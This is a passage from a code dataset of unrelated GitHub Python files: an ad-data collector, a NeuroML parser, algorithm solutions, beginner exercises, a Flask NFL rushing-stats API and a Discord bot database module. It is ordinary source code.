cursor.mogrify(\"(%s, %s, %s, %s, %s, %s, current_date),\", (impression.archive_id, existing_demo_groups[impression.gender + impression.age_range], impression.min_impressions, impression.min_spend, impression.max_impressions, impression.max_spend)).decode('utf-8')\n impression_count += 1\n\n if impression_count >= 250:\n impression_demo_insert_query = impression_demo_insert_query[:-1]\n impression_demo_insert_query += \";\"\n #print(cursor.mogrify(impression_demo_insert_query))\n cursor.execute(impression_demo_insert_query)\n impression_demo_insert_query = \"INSERT INTO demo_impressions(ad_archive_id, demo_id, min_impressions, min_spend, max_impressions, max_spend, crawl_date) VALUES \"\n impression_count = 0\n\n if impression_count > 0:\n impression_demo_insert_query = impression_demo_insert_query[:-1]\n impression_demo_insert_query += \";\"\n #print(cursor.mogrify(impression_demo_insert_query))\n cursor.execute(impression_demo_insert_query)\n\n impression_region_insert_query = \"INSERT INTO region_impressions(ad_archive_id, region_id, min_impressions, min_spend, max_impressions, max_spend, crawl_date) VALUES \"\n impression_count = 0\n for impression in new_ad_region_impressions:\n impression_region_insert_query += cursor.mogrify(\"(%s, %s, %s, %s, %s, %s, current_date),\", (impression.archive_id, existing_regions[impression.name], impression.min_impressions, impression.min_spend, impression.max_impressions, impression.max_spend)).decode('utf-8')\n impression_count += 1\n\n if impression_count >= 250:\n impression_region_insert_query = impression_region_insert_query[:-1]\n impression_region_insert_query += \";\"\n #print(cursor.mogrify(impression_region_insert_query))\n cursor.execute(impression_region_insert_query)\n impression_region_insert_query = \"INSERT INTO region_impressions(ad_archive_id, region_id, min_impressions, min_spend, max_impressions, max_spend, crawl_date) VALUES \"\n impression_count = 0\n\n if impression_count > 0:\n impression_region_insert_query = impression_region_insert_query[:-1]\n impression_region_insert_query += \";\"\n #print(cursor.mogrify(impression_region_insert_query))\n cursor.execute(impression_region_insert_query)\n\n connection.commit()\n\n\n#get page data\npage_ids = []\ninput_FILES = config['INPUT']['FILES']\nprint(input_FILES)\nfile_list = json.loads(input_FILES)\nfor file_name in file_list:\n with open(file_name) as input:\n for row in input:\n page_ids.append(int(row.strip()))\n\n\n#setup our db cursor\nHOST = config['POSTGRES']['HOST']\nDBNAME = config['POSTGRES']['DBNAME']\nUSER = config['POSTGRES']['USER']\nPASSWORD = config['POSTGRES']['PASSWORD']\nPORT = config['POSTGRES']['PORT']\nDBAuthorize = \"host=%s dbname=%s user=%s password=%s port=%s\" % (HOST, DBNAME, USER, PASSWORD, PORT)\nconnection = psycopg2.connect(DBAuthorize)\ncursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\n\nall_ids = list(page_ids)\nrandom.shuffle(all_ids)\nprint(all_ids)\nprint(len(all_ids))\n\n#data structures to hold new ads\nAdRecord = namedtuple('AdRecord', ['archive_id', \n 'page_id', \n 'image_url', \n 'text',\n 'sponsor_label',\n 'creation_date', \n 'start_date', \n 'end_date', \n 'is_active', \n 'min_impressions', \n 'max_impressions', \n 'min_spend', \n 'max_spend',\n 'currency',\n 'ad_creative_link_caption',\n 'ad_creative_link_description',\n 'ad_creative_link_title'])\nPageRecord = namedtuple('PageRecord', ['id', 'name'])\nSnapshotRegionRecord = namedtuple('SnapshotRegionRecord', ['archive_id', 'name', 'min_impressions', 'max_impressions', 'min_spend', 'max_spend', 'crawl_date'])\nSnapshotDemoRecord = namedtuple('SnapshotDemoRecord', ['archive_id', 'age_range', 'gender', 'min_impressions', 'max_impressions', 'min_spend', 'max_spend', 'crawl_date'])\nFB_ACCESS_TOKEN = config['FACEBOOK']['TOKEN']\nSLEEP_TIME = int(config['SEARCH']['SLEEP_TIME'])\nfield_list = [\"ad_creation_time\",\"ad_delivery_start_time\",\"ad_delivery_stop_time\",\"ad_snapshot_url\", \"currency\", \"demographic_distribution\", \"impressions\", \"page_id\", \"page_name\", \"region_distribution\", \"spend\", \"ad_creative_body\", \"funding_entity\", \"ad_creative_link_caption\", \"ad_creative_link_description\", \"ad_creative_link_title\"]\n\n\nfor id in all_ids:\n main(id, connection)\n\nconnection.close()\n","repo_name":"CybersecurityForDemocracy/FacebookApiPolAdsCollector","sub_path":"page_id_fb_collector.py","file_name":"page_id_fb_collector.py","file_ext":"py","file_size_in_byte":23143,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"61"} +{"seq_id":"1042736983","text":"import os;\nimport xml.etree.ElementTree as ET\nimport csv\nimport threading\nimport re\n\n\n#This function reads the file names and seperates the .cell.nml files from the rest of the files\ndef readfiles(): \n print(\"Processing \",len(os.listdir(dir)))\n for filename in os.listdir(dir):\n if(filename.endswith(\".cell.nml\")):\n cellFiles.append(filename)\n\n cellFiles.sort()\n\ndef getPubMedId():\n #As we don't have any PubMed in cell files, we are using the default PubMed from the referred paper\n return \"26451489\"\n\ndef writeCellRows():\n\n cellIndex = 0\n cellIncludes = []\n\n for cellFile in cellFiles:\n\n print(cellFile)\n\n # Reuse includes from first cell, all cells have same includes\n if len(cellIncludes) == 0:\n cv = dir + cellFile;\n tree = ET.parse(cv);\n root = tree.getroot();\n\n for child in root:\n if(child.tag ==\"{http://www.neuroml.org/schema/neuroml2}include\"):\n if(child.attrib['href']):\n cellIncludes.append(child.attrib['href']);\n\n modelName, neurolexTerms, neurolexIDs, keywords = parseAcronyms(cellFile)\n\n modelName = modelNameCleanup(modelName)\n\n [children_set.add(child) for child in cellIncludes]\n\n writeCellRow(modelName + \" (\" + str(cellIndex % 5 + 1) + \")\", cellIncludes, cellFile, neurolexTerms, neurolexIDs, keywords)\n\n cellIndex += 1\n\ndef appendToFile(row): #\n resultFile = open(\"cells_data.csv\", 'ab')\n wr = csv.writer(resultFile, dialect='excel')\n wr.writerow(row)\n resultFile.close();\n\ndef writeCellRow(modelName, cellIncludes,cellFile,neurolexTerms, neurolexIDs, keywords):\n row=[]\n row.append('CL')\n row.append(modelName)\n row.append(cellFile)\n row.append(','.join(cellIncludes))\n row.append('(BlueBrainProject,https://bbp.epfl.ch/nmc-portal/downloads)')\n row.append(neurolexTerms)\n row.append(neurolexIDs)\n row.append(keywords)\n row.append(getPubMedId())\n row.append('Padraig Gleeson')\n row.append('none')\n\n appendToFile(row)\n\ndef modelNameCleanup(name):\n return name.replace(\"Layer 2, Layer 3\",\"Layer 2/3\")\n\ndef parseAcronyms(filename):\n\n # Find the cell file acronyms\n match = re.match(r\"(\\w+?)(?:int)?\\d+?_(\\w+?)_((?:\\w+?(?:_L1|_L4)|\\w+?))_\", filename)\n etype = match.group(1)\n layer = match.group(2)\n mtype = match.group(3)\n\n fullE, neurolexE, keywordsE = getAcronymData(etype)\n fullL, neurolexL, keywordsL = getAcronymData(layer)\n fullM, neurolexM, keywordsM = getAcronymData(mtype)\n\n return (fullL + \" \" + fullE + \" \" + fullM), \\\n (fullE + \",\" + fullL + \",\" + fullM), \\\n (neurolexE + \",\" + neurolexL + \",\" + neurolexM), \\\n (keywordsE + \",\" + keywordsL + \",\" + keywordsM)\n\nterms = []\n\ndef getAcronymData(acronym):\n\n # Cache the term mapping file\n if len(terms) == 0:\n with open('term_mapping.csv', 'rb') as f:\n reader = csv.reader(f)\n reader.next()\n for row in reader:\n terms.append(row)\n\n for row in terms:\n if(acronym == row[0]):\n return row[1],row[2],row[3]\n\n return \"none\",\"none\",\"none\"\n\ndef getAvailableChannels():\n channelChildren = set()\n with open('ChannelsReformat.csv', 'rb') as channels:\n reader = csv.reader(channels)\n reader.next()\n for row in reader:\n channelChildren.add(row[2])\n #print channelChildren\n return channelChildren\n\ndef nonExistingChannels(childCells, channelChildren):\n return childCells - channelChildren\n\n\nif __name__ == \"__main__\":\n # import pydevd\n # pydevd.settrace('10.211.55.3', port=4200, stdoutToServer=True, stderrToServer=True)\n\n dir = cv = \"cells/\" # path to cells folder\n cellFiles = []\n cell_channel ={}\n children_set = set()\n readfiles();\n resultFile = open(\"cells_data.csv\", 'wb')\n wr = csv.writer(resultFile, 'excel')\n wr.writerow(['modelType', 'modelName', 'fileName', 'children', 'references', 'neurolexTerm', 'neurolexURI', 'keywords', 'pubmedID', 'translator', 'authors']);\n resultFile.close()\n writeCellRows();\n getAvailableChannels()\n print(nonExistingChannels(children_set, getAvailableChannels()))\n\n","repo_name":"scrook/neuroml-db","sub_path":"Import Scripts/Sources/HBP/cellParser.py","file_name":"cellParser.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"28367878161","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def recoverTree(self, root: Optional[TreeNode]) -> None:\n \"\"\"\n Do not return anything, modify root in-place instead.\n \"\"\"\n stack = []\n count = 2\n pred = None\n x = y = None\n while stack or root:\n # keep traversing left\n while root:\n stack.append(root)\n root = root.left\n # when no more left node\n # pop the stack top\n root = stack.pop()\n if pred and root.val < pred.val:\n y = root\n if not x:\n x = pred\n else:\n break\n # root is the predecessor to the next node\n pred = root\n # go right\n root = root.right\n x.val , y.val = y.val, x.val\n ","repo_name":"medasuryatej/InterviewPrep","sub_path":"99-recover-binary-search-tree/99-recover-binary-search-tree.py","file_name":"99-recover-binary-search-tree.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4732505075","text":"#Basic Numerical Operations\r\n#\r\n# +\r\n# -\r\n# *\r\n# /\r\n# %\r\n# // (Floor)\r\n# ** (Exponentiation)\r\n\r\ndef arithmatic():\r\n age1 = 9\r\n age2 = 8\r\n age3 = 6\r\n sum_age = age1+age2+age3\r\n print(f\"Sum of Age: {sum_age}\")\r\n avarage_age_floor = sum_age//3\r\n avarage_age_frac = sum_age/3\r\n print(f\"Average Age(int): {avarage_age_floor}\\nAverage Age(fraction): {avarage_age_frac}\")\r\n\r\n\r\ndef modular():\r\n x = 899\r\n y = 5\r\n z = (x%y)%y\r\n zz = x%y\r\n print(z,zz)\r\n\r\ndef expon():\r\n a,b =input().split()\r\n print(int(a)**int(b)) #pow(a,b)\r\n\r\n\r\nif __name__ == '__main__':\r\n arithmatic()\r\n modular()\r\n expon()\r\n","repo_name":"SihabSahariar/BRACU-CSE","sub_path":"CSE111-Python/CSE111-Python-master/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"13329029539","text":"# Mad Libs\n# Lorraine Bichara Assad\n# march 16, 2018\n# The program will first prompt the user for a series of inputs a la Mad Libs. For example, a singular noun, an adjective, etc. Then, once all the information has been inputted, the program will take that data and place them into a premade story template.\n\nnoun = raw_input(\"Introduce a noun: \")\nnoun2 = raw_input(\"Introduce another noun: \")\nadjective = raw_input(\"Introduce an adjective: \")\nverb = raw_input(\"Introduce a verb: \")\n\nmadLib = \"I am a teen-age \" + noun + \" who lives in a two-story \" + noun2 + \" on Mars. I will put this message in a/an \" + adjective + \" bottle and \" + verb + \" it into space and hope that it gets to Earth.\"\nprint(madLib)","repo_name":"lorbichara/100-days-of-code","sub_path":"Python/MadLib.py","file_name":"MadLib.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17770475216","text":"#假设你获取了用户输入的日期和时间如2015-1-21 9:01:30,\n#以及一个时区信息如UTC+5:00,均是str,请编写一个函数将其转换为timestamp:\nimport re\nfrom datetime import datetime, timezone, timedelta\ndef to_timestamp(ddt_str,tz_str):\n m=re.match(r'^UTC(\\+|-)(0[0-9]|[0-9]):00',tz_str)\n UTC=int(m.group(1)+m.group(2))\n cday=datetime.strptime(ddt_str,'%Y-%m-%d %H:%M:%S')\n utc_dt=cday.replace(tzinfo=timezone(timedelta(hours=UTC)))\n timestp=utc_dt.timestamp()\n return timestp\n\nprint(to_timestamp('2015-5-31 16:10:30', 'UTC-09:00'))\n \n","repo_name":"wudongdong1000/Liaopractice","sub_path":"practice_34.py","file_name":"practice_34.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23585060851","text":"import fileinput\n\n\ndef solve(time_array, source, target):\n N = len(time_array)\n real_time = []\n max_time = time_array[source][target]\n for n in range(N):\n real_time.append([max_time] * N)\n real_time[-1][n] = 0\n\n queue = [source]\n while len(queue) > 0:\n s = queue.pop(0)\n for t in range(N):\n if real_time[source][s] + time_array[s][t] > max_time:\n continue\n if real_time[source][s] + time_array[s][t] < real_time[source][t]:\n real_time[source][t] = real_time[source][s] + time_array[s][t]\n if target == t:\n max_time = real_time[source][t]\n else:\n queue.append(t)\n\n return real_time[source][target]\n\n\n\n\ndef make_time_arr(horses, distance):\n N = len(horses)\n time_dist = []\n max_time = 10**12\n for n in range(N):\n time_dist.append([max_time] * N)\n time_dist[-1][n] = 0\n\n for i, h in enumerate(horses):\n hdist, hspeed = h\n queue = [(i, hdist)]\n\n while len(queue) > 0:\n source, dist = queue.pop(0)\n for target in range(N):\n if distance[source][target] < 0 or distance[source][target] > dist:\n continue\n time = distance[source][target] / hspeed\n if time_dist[i][source] + time < time_dist[i][target]:\n time_dist[i][target] = time_dist[i][source] + time\n queue.append((target, dist - distance[source][target]))\n\n return time_dist\n\ninp = fileinput.input()\n\nnum_cases = int(inp.readline())\nfor t in range(1, num_cases + 1):\n N, Q = (int(x) for x in inp.readline().split())\n horses = []\n for _ in range(N):\n horses.append(tuple(int(x) for x in inp.readline().split()))\n distance = []\n\n for _ in range(N):\n distance.append(tuple(int(x) for x in inp.readline().split()))\n assert len(distance[-1]) == N\n\n time_arr = make_time_arr(horses, distance)\n\n times = []\n for _ in range(Q):\n U,V = (int(x) for x in inp.readline().split())\n times.append(solve(time_arr, U-1, V-1))\n\n print(\"Case #{}: {}\".format(t, \" \".join(\"{:.6f}\".format(t) for t in times)))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_208/65.py","file_name":"65.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23478181644","text":"from rest_framework import serializers\nfrom .models import Task\n\n\nclass TaskSerializer(serializers.ModelSerializer):\n class Meta:\n model = Task\n fields = ('id', 'title', 'completed')\n\n def validate_title(self, value):\n # Add custom validation logic here\n if len(value) < 5:\n raise serializers.ValidationError(\n \"Title must be at least 5 characters long.\")\n return value\n\n def validate_completed(self, value):\n # Add custom validation logic here\n if value and not self.instance:\n raise serializers.ValidationError(\n \"A new task cannot be completed.\")\n return value\n","repo_name":"Elian-ui/recipe-django","sub_path":"recipemanager/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12515546767","text":"T = int(input())\nfor t in range(1, T+1):\n N = int(input())\n values = []\n for i in range(N):\n values.append(list(map(int, input().split())))\n max_value = -1\n for row in range(N):\n for col in range(N):\n if row > 1 and col > 1:\n break\n val = 0\n for delta in range(N):\n if row + delta >= N or col + delta >= N:\n break\n val += values[row+delta][col+delta]\n if max_value < val:\n max_value = val\n print('Case #{}: {}'.format(t, max_value))\n","repo_name":"satojkovic/algorithms","sub_path":"kickstart/2020/RoundG/maximum_coins.py","file_name":"maximum_coins.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36626885574","text":"'''\n@Author : \n@Contact : \n'''\n\nfrom package_parameters.parameters_fullImgMotion import Parameters\nimport package_utils.fold_handler as fh\nimport os\nfrom shutil import copyfile\n\ndef setParameters():\n\n p=Parameters(\n MODEL_NAME='raft',\n PRES='/run/media/laine/DISK/PROJECTS_IO/caroSegMotion/NETWORK_TRAINING/RAFT_PRETRAINED_FLYINGCHAIR_10_PX_FINE_TUNING',\n PSAVE='/run/media/laine/DISK/PROJECTS_IO/caroSegMotion/PREDICTION/DL_METHOD_FULL_IMAGES',\n PDATA='/run/media/laine/DISK/PROJECTS_IO/caroSegMotion/IN_SILICO/REAL_DATA/prepared_data_IMAGENET',\n DROPOUT=0,\n CORRELATION_LEVEL=4,\n CORRELATION_RADIUS=4,\n RESTORE_CHECKPOINT=True,\n ALTERNATE_COORDINATE=False,\n PSPLIT=\"/run/media/laine/DISK/PROJECTS_IO/caroSegMotion/IN_SILICO/REAL_DATA/SPLIDATA/validation_patients.txt\",\n PIXEL_WIDTH=256,\n PIXEL_HEIGHT=256,\n ROI_WIDTH=5e-3,\n SHIFT_X=32,\n SHIFT_Z=32)\n\n pparam=os.path.join(p.PRES, 'backup_parameters')\n fh.create_dir(pparam)\n\n # --- Print all attributes in the console\n attrs=vars(p)\n print('\\n'.join(\"%s: %s\" % item for item in attrs.items()))\n print('----------------------------------------------------------------')\n\n # --- Save a backup of the parameters so it can be tracked on Git, without requiring to be adapted by from other contributors\n copyfile(os.path.join('package_parameters', os.path.basename(__file__)), os.path.join(pparam, 'get_parameters_training.py'))\n\n # --- Return populated object from Parameters class\n return p\n","repo_name":"nl3769/CCA_DL_TOOLS","sub_path":"caroDeepMotion/package_parameters/set_parameters_fullImgMotion_template.py","file_name":"set_parameters_fullImgMotion_template.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"21329603390","text":"import pygame\n\nfrom random import randint\nfrom configs import *\n\n\ndef verify_colisions(sprite_group_a: pygame.sprite.Group, sprite_group_b:pygame.sprite.Group):\n \"\"\"Verifica a colisão dos grupos e mata o grupo concorrente em caso de colisão:\n\n Args:\n sprite_group_a (pygame.sprite.Group): Grupo que colide. Este grupo deleta o grupo B\n sprite_group_b (pygame.sprite.Group): Grupo a ser colidido. Este grupo é deletado pelo grupo A.\n \"\"\"\n colision_dict: dict[pygame.sprite.Sprite] = pygame.sprite.groupcollide( sprite_group_a, sprite_group_b, False, False)\n if len(colision_dict) != 0:\n print(f'Colisões detectadas {sprite_group_a} >>> {sprite_group_b}')\n for sprite in colision_dict:\n sprite.kill()\n\ndef verify_sprite_errors(sprite):\n \"\"\"Verifica se a Sprite está de acordo com os padrões do sistema: Ela precisa possuir os atributos rect e speed\n\n Args:\n sprite (pygame.sprite.Sprite): Objeto sprite em questão\n \"\"\"\n try:\n sprite.speed\n sprite.rect\n int(sprite.speed)\n except Exception:\n Exception('\\n\\nO valor inserido não é uma sprite ou não possui o atributo speed do tipo inteiro\\n\\n')\n\ndef calculate_distance(sprite: pygame.sprite.Sprite, target: pygame.sprite.Sprite):\n \"\"\"Calcula a distancia entre 2 sprite.\n\n Args:\n sprite (sprite.Sprite): Sprite usado como ponto A\n target (sprite.Sprite): Sprite usado como ponto B\n\n Returns:\n int: Distancia entre os dois pontos\n \"\"\"\n verify_sprite_errors(sprite)\n dx = sprite.rect.x - target.rect.x\n dy = sprite.rect.y - target.rect.y\n distance = (dx ** 2 + dy ** 2) ** 0.5\n print(f'distância x: {dx} | distância y: {dy}')\n print({distance})\n return distance\n\ndef render_coordinates_aside(sprite_objct: pygame.sprite.Sprite, font:pygame.font.Font, color: pygame.color.Color):\n \"\"\"Gera texto com as coordenadas do objeto em x, y ao lado dele\n\n Args:\n sprite_objct (sprite.Sprite): Um objeto sprite com um uma rect \n font (font.Font): um objeto do tipo fonte para especificar qual fonte será renderizada\n color (color.Color): um objeto do tipo color do pygame\n\n Raises:\n Exception: Caso o objeto fornecido não seja \n \"\"\"\n try:\n text_surface = font.render(f'x:{sprite_objct.rect.x} y:{sprite_objct.rect.y}', True, color)\n except:\n raise Exception('\\n\\nO objeto fornecido não é do tipo \"pygame.font.Font\"\\n\\n')\n text_pos = (sprite_objct.rect.x + sprite_objct.rect.size[0] + 10, sprite_objct.rect.centery - text_surface.get_height()//2)\n window.blit(text_surface, text_pos) \n\ndef random_move(sprite):\n \"\"\"Movimenta a sprite de forma aleatoria\n Args:\n sprite (sprite.Sprite): Sprite a ser movimentada\n \"\"\"\n verify_sprite_errors(sprite)\n random_number = randint(0,10)\n move_random_x(sprite, random_number)\n move_random_y(sprite, random_number)\n\n\ndef move_random_x(sprite, random_coin):\n \"\"\"Movimenta a sprite de acordo com o numero fornecido: 0 para direita, 1 para esquerda\n\n Args:\n sprite (sprite.Sprite): Sprite a ser movida\n random_coin (int): numero especifico: 0 - 1\n \"\"\"\n if random_coin == 0: \n if sprite.rect.x < width - sprite.rect.size[0]: #se for muito para a direita da tela\n sprite.rect.move_ip(sprite.speed, 0)\n return\n sprite.rect.x -= sprite.speed\n if random_coin == 1:\n if sprite.rect.x > 0: #se for muito para a esquerda da tela\n sprite.rect.move_ip(-sprite.speed, 0)\n return\n sprite.rect.x += sprite.speed\n\ndef move_random_y(sprite , random_coin):\n \"\"\"Movimenta a sprite de acordo com o numero fornecido: 2 para baixo, 3 para cima\n\n Args:\n sprite (sprite.Sprite): Sprite a ser movida\n random_coin (int): numero especifico: 2 - 3\n \"\"\"\n if random_coin == 2:\n if sprite.rect.y < height - sprite.rect.size[0]: #se for muito para baixo\n sprite.rect.move_ip(0, sprite.speed)\n return\n sprite.rect.y -= sprite.speed\n if random_coin == 3:\n if sprite.rect.y > 0: #se for muito para cima\n sprite.rect.move_ip(0, -sprite.speed)\n return\n sprite.rect.y += sprite.speed\n","repo_name":"Jason21tod/square_wars","sub_path":"assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43144930420","text":"# We can either increase sum of nums1 or sum of num2\n# If we want to increase sum of nums1, we will select subarray from i to j with maximum sum of nums2[i] - nums1[i];\n# If we want to increase sum of num2, we will select subarray from i to j with maximum sum of nums1[i] - nums2[i];\n\n# Time Complexity -> O(N)\n# Space Complexity -> O(1)\nclass Solution:\n def kadane(self , a,size):\n max_so_far = -maxsize - 1\n max_ending_here = 0\n start = 0\n end = 0\n s = 0\n\n for i in range(0,size):\n\n max_ending_here += a[i]\n\n if max_so_far < max_ending_here:\n max_so_far = max_ending_here\n start = s\n end = i\n\n if max_ending_here < 0:\n max_ending_here = 0\n s = i+1\n return [max_so_far , start , end] # maximum subarray sum exists from index start to index end\n \n \n def maximumsSplicedArray(self, nums1: List[int], nums2: List[int]) -> int:\n dif1 , dif2 = [] , []\n n = len(nums1)\n for i in range(n):\n dif1.append(nums1[i]-nums2[i])\n dif2.append(nums2[i]-nums1[i])\n\n\n\t\t# base case: if no swapping done.\n ans = max( sum(nums1) , sum(nums2))\n \n \n # find answer after swapping eleemnts of nums2\n s1 , x1 , y1 = self.kadane(dif1 , n) \n if s1<=0:\n pass\n else:\n cur = 0\n for i in range(n):\n if x1<= i<=y1: # swap elements from index start to index end\n cur+=nums1[i]\n else:\n cur+=nums2[i]\n ans = max( ans , cur)\n\n # find naswer after swapping elements of nums1\n s2 , x2 , y2 = self.kadane(dif2 , n)\n if s2<=0:\n pass\n else:\n cur = 0\n for i in range(n):\n if x2<= i<=y2: # swap elements from index start to index end\n cur+=nums2[i]\n else:\n cur+=nums1[i]\n ans = max( ans , cur)\n \n return ans","repo_name":"hardik302001/leetcode","sub_path":"problems/maximum_score_of_spliced_array/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"10424666186","text":"import os\nimport sys\nfrom time import gmtime, strftime\nfrom flask import Flask, jsonify, render_template, abort, request, send_file, Response, send_from_directory, make_response, request, current_app\nfrom flask_compress import Compress\nfrom itertools import *\nimport nflgame\nimport logging\nfrom memory_profiler import profile\nimport ypc\n\napp = Flask(__name__)\nCompress(app)\n\nAPI_ROOT = '/api/v0';\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\nAPP_STATIC = os.path.join(APP_ROOT, 'static')\n\n@app.errorhandler(400)\ndef custom400(error):\n response = jsonify({'message': error.description})\n return response\n\n# SSL\nCHECK_URL = \"/.well-known/acme-challenge/E21iMwAQvH_ezOQTr1PIb-FTWQdhho1Q3KwJc0lpsvo\"\n@app.route(CHECK_URL)\ndef check_url():\n return \"E21iMwAQvH_ezOQTr1PIb-FTWQdhho1Q3KwJc0lpsvo.c98f0gzyazQulnJchxS6U0wR09DCHc4HutKAPXlEx_8\"\n\n# RELOAD NFLGAME\n@app.route('/reload')\ndef reload_nflgame():\n reload(nflgame)\n return render_template('index.html')\n\n@app.route('/update_players')\ndef update_players():\n import subprocess\n output = subprocess.check_output(['nflgame-update-players'], stderr=subprocess.STDOUT)\n return output\n\n# VIEWS\n@app.route('/')\ndef root():\n return render_template('index.html')\n\n@app.route('/top')\ndef top():\n return render_template('index.html')\n\n@app.route('/player/')\ndef player(path):\n return render_template('index.html')\n\n# API ROUTES\n@app.route(API_ROOT + '/player_name/')\ndef get_player_name(id):\n if id in nflgame.players:\n return jsonify(result = nflgame.players[id].name)\n else:\n abort(400, {\"description\": \"No such player with the ID: {}\".format(id)})\n\n@app.route(API_ROOT + '/data/', methods=['GET'])\ndef send_list(filename):\n return send_from_directory('static/data', filename)\n\n@app.route(API_ROOT + '/weeks/', methods=['GET'])\ndef weeks(year):\n return jsonify(result = ypc.get_weeks(year))\n\n@app.route(API_ROOT + '/toprushers//', methods=['GET'])\ndef toprushers(year,count=100):\n try:\n weeks = ypc.get_weeks(year)\n plays = nflgame.combine_game_stats(nflgame.games(int(year), weeks)).rushing().sort('rushing_yds').limit(int(count))\n topplayers = imap(ypc.get_rusher_stats, plays)\n return jsonify(result = list(topplayers))\n except Exception as e:\n abort(400, e)\n\n@app.route(API_ROOT + '/topreceivers//', methods=['GET'])\ndef topreceivers(year,count=100):\n try:\n weeks = ypc.get_weeks(year)\n plays = nflgame.combine_game_stats(nflgame.games(int(year), weeks)).receiving().sort('receiving_yds').limit(int(count))\n topplayers = imap(ypc.get_receiver_stats, plays)\n return jsonify(result = list(topplayers))\n except Exception as e:\n abort(400, e)\n\n@app.route(API_ROOT + '/rushingyards///', methods=['GET'])\n@app.route(API_ROOT + '/rushingyards////', methods=['GET'])\ndef rushingyards(playerid, team, year, week=None):\n try:\n if week:\n weeks = [int(week)]\n else:\n weeks = ypc.get_weeks(year)\n games = nflgame.games(int(year), week=weeks, home=team, away=team)\n if games != []:\n all_plays = nflgame.combine_plays(games)\n rushing_yds_per_att = list(ifilter(ypc.exists, imap(lambda x:ypc.parse_rushing_play(x,playerid), all_plays)))\n return jsonify(result = rushing_yds_per_att)\n except Exception as e:\n app.logger.error(\"error: {}\".format(e))\n return jsonify(result = [])\n\n@app.route(API_ROOT + '/receivingyards///', methods=['GET'])\n@app.route(API_ROOT + '/receivingyards////', methods=['GET'])\ndef receivingyards(playerid,team,year,week=None):\n try:\n if week:\n weeks = [int(week)]\n else:\n weeks = ypc.get_weeks(year)\n games = nflgame.games(int(year), week=weeks, home=team, away=team)\n if games != []:\n all_plays = nflgame.combine_plays(games)\n receiving_yds_per_att = list(ifilter(ypc.exists, imap(lambda x:ypc.parse_receiving_play(x,playerid), all_plays)))\n\n return jsonify(result = receiving_yds_per_att)\n except Exception as e:\n app.logger.error(\"error: {}\".format(e))\n return jsonify(result = [])\n\n@app.after_request\ndef add_cors(resp):\n \"\"\" Ensure all responses have the CORS headers. This ensures any failures are also accessible\n by the client. \"\"\"\n resp.headers['Accept-Ranges'] = 'bytes'\n resp.headers['Last-Modified'] = strftime(\"%a, %d %b %Y %X GMT\", gmtime())\n resp.headers['Access-Control-Allow-Origin'] = request.headers.get('Origin','*')\n resp.headers['Access-Control-Allow-Methods'] = 'POST, PUT, GET'\n resp.headers['Access-Control-Allow-Headers'] = request.headers.get(\n 'Access-Control-Request-Headers', 'Authorization' )\n if app.debug:\n resp.headers['Access-Control-Max-Age'] = '432000000'\n return resp\n\n###################\n\ndef main():\n port = int(os.environ.get('PORT',5000))\n app.debug = True\n app.run(host='0.0.0.0', port=port)\n\nif __name__ != '__main__':\n gunicorn_logger = logging.getLogger('gunicorn.error')\n app.logger.handlers = gunicorn_logger.handlers\n app.logger.setLevel(gunicorn_logger.level)\n\nif __name__ == '__main__':\n main()\n","repo_name":"calvinhu/ypc-graph","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74506833475","text":"import logging\n\nimport aiopg\nimport aioredis\nfrom discord.ext.commands import Bot, Cog\nfrom pypika import PostgreSQLQuery\n\nfrom fresnel import constants\n\n\nlog = logging.getLogger(__name__)\n\n\nclass DBManager(Cog):\n REDIS_DEFAULT_DICT = {\n 'host': 'localhost',\n 'port': 6379,\n 'db': 0,\n 'password': None,\n }\n\n def __init__(self, bot: Bot):\n self.bot = bot\n\n async def _init(self):\n self.db_info = self.bot._config.get(\n 'psql_info',\n default=constants.PSQL_DEFAULT_DICT,\n comment=\"PostgreSQL database and user information\",\n )\n\n self.redis_info = self.bot._config.get(\n 'redis_info',\n default=self.REDIS_DEFAULT_DICT,\n comment=\"Redis remote dictionary server connection information\",\n )\n\n self.db_info = {\n k: v for k, v in self.db_info.items() if v is not None\n }\n\n needed = constants.PSQL_DEFAULT_DICT.keys() - self.db_info\n\n if needed:\n log.error(\"please fully configure your PostgreSQL information in \"\n \"your configuration file. \"\n f\"missing keys: {', '.join(needed)}\")\n raise ValueError(\n \"Postgres config. \"\n f\"missing keys: {', '.join(needed)}\"\n )\n\n needed = {'host', 'port', 'db'} - 